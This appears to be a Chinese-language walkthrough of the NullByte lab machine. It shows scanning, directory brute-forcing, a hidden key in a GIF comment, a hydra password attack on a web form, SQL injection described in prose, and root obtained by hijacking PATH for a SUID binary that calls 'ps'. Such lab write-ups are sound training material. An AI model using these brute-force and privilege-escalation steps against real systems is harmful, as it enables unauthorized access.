Nullbyte 靶机

信息收集

nmap 扫描

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.108
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-27 02:59 EDT
Nmap scan report for 192.168.56.108
Host is up (0.00022s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
38157/tcp open  unknown
MAC Address: 08:00:27:1C:0D:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80,111,777,38157 192.168.56.108
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-27 03:01 EDT
Nmap scan report for 192.168.56.108
Host is up (0.00038s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Null Byte 00 - level 1
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          38157/tcp   status
|   100024  1          40076/udp   status
|   100024  1          53418/tcp6  status
|_  100024  1          53583/udp6  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA)
|   2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA)
|   256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA)
|_  256 bc:f7:44:8d:79:6a:19:48:76:a3:e2:44:92:dc:13:a2 (ED25519)
38157/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:1C:0D:6F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80,111,777,38157 192.168.56.108 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-27 03:03 EDT
Nmap scan report for 192.168.56.108
Host is up (0.00026s latency).

PORT      STATE SERVICE
80/tcp    open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|_  /uploads/: Potentially interesting folder
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
111/tcp   open  rpcbind
777/tcp   open  multiling-http
38157/tcp open  unknown
MAC Address: 08:00:27:1C:0D:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 321.11 seconds

Web 界面查看

有一张图片，main.gif，源码中没有什么有价值的信息，目录爆破一下吧

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.56.108 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,zip,html,sql,php -t 64
[sudo] password for kali: 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.108
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              sql,php,txt,zip,html
[+] Timeout:                 10s
===============================================================
2023/05/27 05:11:27 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 294]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.108/uploads/]
/index.html           (Status: 200) [Size: 196]
/.php                 (Status: 403) [Size: 293]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.108/javascript/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.56.108/phpmyadmin/]
/.html                (Status: 403) [Size: 294]
/.php                 (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 302]
Progress: 1321309 / 1323366 (99.84%)===============================================================
2023/05/27 05:15:20 Finished
===============================================================

看一下 phpmyadmin

尝试弱密码失败，总不能爆破吧……再看看 uploads

emmmm 还是没啥思路，看一眼红队笔记，原来是首页图片中包含了隐藏信息

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ wget http://192.168.56.108/main.gif
--2023-05-28 03:43:54--  http://192.168.56.108/main.gif
Connecting to 192.168.56.108:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16647 (16K) [image/gif]
Saving to: ‘main.gif’

main.gif                                                   100%[=======================================================================================================================================>]  16.26K  --.-KB/s    in 0s      

2023-05-28 03:43:54 (95.3 MB/s) - ‘main.gif’ saved [16647/16647]

使用工具查看文件头和基础信息

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ file main.gif    
main.gif: GIF image data, version 89a, 235 x 302

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ binwalk main.gif 

DECIMAL       HEXADECIMAL     DESCRIPTION
------------------------------------------------------------------------
0             0x0             GIF image data, version "89a", 235 x 302

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ exiftool main.gif 
ExifTool Version Number         : 12.57
File Name                       : main.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2015:08:01 12:39:30-04:00
File Access Date/Time           : 2023:05:28 03:44:10-04:00
File Inode Change Date/Time     : 2023:05:28 03:43:54-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

得到一串很短的字符，这时候需要发散思维，首先尝试 phpmyadmin 登录，失败。其次尝试是否是 base64 或者其他的加密方式，失败。最后尝试目录，成功

看来是个需要输入密码的地方，看一眼网页源代码

应该是可以爆破的，那就尝试 hydra 爆破

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ hydra -l root -P /usr/share/wordlists/rockyou.txt -s 80 192.168.56.108 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key"
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-28 04:01:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.56.108:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4504.00 tries/min, 4504 tries in 00:01h, 14339895 to do in 53:04h, 16 active
[STATUS] 4088.00 tries/min, 12264 tries in 00:03h, 14332135 to do in 58:26h, 16 active
[80][http-post-form] host: 192.168.56.108   login: root   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-28 04:07:27

成功得到了密码，进入之后发现是个根据用户名查询信息的界面，异常简陋，看起来可能存在 sql 注入，尝试 ' 失败，得到如下结果，分别尝试数字和 ' 的拼接还是这个界面，

尝试 " 成功，然后就是手工构造 sql 注入语句的过程

联合查询

查看数据库名

查看表名

查看列名

查看内容

base 64 解密一下

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ echo -e "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE-" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81base64: invalid input

看起来还是一层加密

找一找 hash 破解工具

得到了密码，和之前的用户名一起，尝试 ssh 登录

┌──(kali㉿kali)-[~/Downloads/Nullbyte]
└─$ ssh ramses@192.168.56.108 -p777
ramses@192.168.56.108\'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ whoami
ramses
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ uname -a
Linux NullByte 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt11-1+deb8u2 (2015-07-17) i686 GNU/Linux
ramses@NullByte:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:1c:0d:6f brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.108/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe1c:d6f/64 scope link 
       valid_lft forever preferred_lft forever
ramses@NullByte:~$ sudo -l
[sudo] password for ramses: 
Sorry, user ramses may not run sudo on NullByte.

提权

查看 s 权限的时候发现一个特殊文件，位于 backup 目录中

ramses@NullByte:/home$ find / -type f -perm -04000 -ls 2>/dev/null
273365  552 -rwsr-xr-x   1 root     root       562536 Mar 23  2015 /usr/lib/openssh/ssh-keysign
274287   16 -rwsr-xr-x   1 root     root        13796 Nov 28  2014 /usr/lib/policykit-1/polkit-agent-helper-1
267213    8 -rwsr-xr-x   1 root     root         5372 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
261444   12 -rwsr-xr-x   1 root     root         9540 Apr 15  2015 /usr/lib/pt_chown
271482  356 -rwsr-xr--   1 root     messagebus   362672 May 28  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
273383   96 -rwsr-sr-x   1 root     mail        96192 Feb 12  2015 /usr/bin/procmail
272955   52 -rwsr-sr-x   1 daemon   daemon      50644 Sep 30  2014 /usr/bin/at
265920   52 -rwsr-xr-x   1 root     root        52344 Nov 20  2014 /usr/bin/chfn
263697   40 -rwsr-xr-x   1 root     root        38740 Nov 20  2014 /usr/bin/newgrp
265925   44 -rwsr-xr-x   1 root     root        43576 Nov 20  2014 /usr/bin/chsh
265924   80 -rwsr-xr-x   1 root     root        78072 Nov 20  2014 /usr/bin/gpasswd
274292   20 -rwsr-xr-x   1 root     root        18064 Nov 28  2014 /usr/bin/pkexec
265921   52 -rwsr-xr-x   1 root     root        53112 Nov 20  2014 /usr/bin/passwd
278443  176 -rwsr-xr-x   1 root     root       176400 Mar 12  2015 /usr/bin/sudo
273033 1056 -rwsr-xr-x   1 root     root      1081076 Feb 18  2015 /usr/sbin/exim4
391947    8 -rwsr-xr-x   1 root     root         4932 Aug  2  2015 /var/www/backup/procwatch
519235   40 -rwsr-xr-x   1 root     root        38868 Nov 20  2014 /bin/su
519210   36 -rwsr-xr-x   1 root     root        34684 Mar 30  2015 /bin/mount
519212   28 -rwsr-xr-x   1 root     root        26344 Mar 30  2015 /bin/umount
   149   96 -rwsr-xr-x   1 root     root        96760 Aug 13  2014 /sbin/mount.nfs

cat 去查看/var/ www/backup/procwatch 文件，似乎是 gcc 编译后得到的文件

ramses@NullByte:/home$ ls -liah /var/www/backup/procwatch
391947 -rwsr-xr-x 1 root root 4.9K Aug  2  2015 /var/www/backup/procwatch

运行一下试试

ramses@NullByte:/var/www/backup$ /var/www/backup/procwatch
  PID TTY          TIME CMD
 1485 pts/0    00:00:00 procwatch
 1486 pts/0    00:00:00 sh
 1487 pts/0    00:00:00 ps

似乎是调用了 sh 和 ps，这里的提权方法需要记忆一下

ramses@NullByte:/var/www/backup$ ln -s /bin/sh ps
ramses@NullByte:/var/www/backup$ export PATH=.:$PATH
ramses@NullByte:/var/www/backup$ ./procwatch 
# whoami
root
# id
uid=1002(ramses) gid=1002(ramses) euid=0(root) groups=1002(ramses)
# cd /root
# ls
proof.txt
# cat pro  
cat: pro: No such file or directory
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----